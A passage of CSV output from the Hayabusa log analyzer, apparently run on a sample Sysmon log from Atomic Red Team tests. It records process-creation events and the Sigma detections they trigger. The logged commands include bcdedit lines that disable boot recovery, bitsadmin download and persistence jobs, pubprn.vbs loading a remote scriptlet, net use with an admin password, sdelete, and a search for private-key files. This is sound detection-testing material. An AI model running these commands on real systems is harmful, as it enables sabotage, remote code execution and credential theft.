MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} recoveryenabled no : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /create AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /complete AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /resume AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .key : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 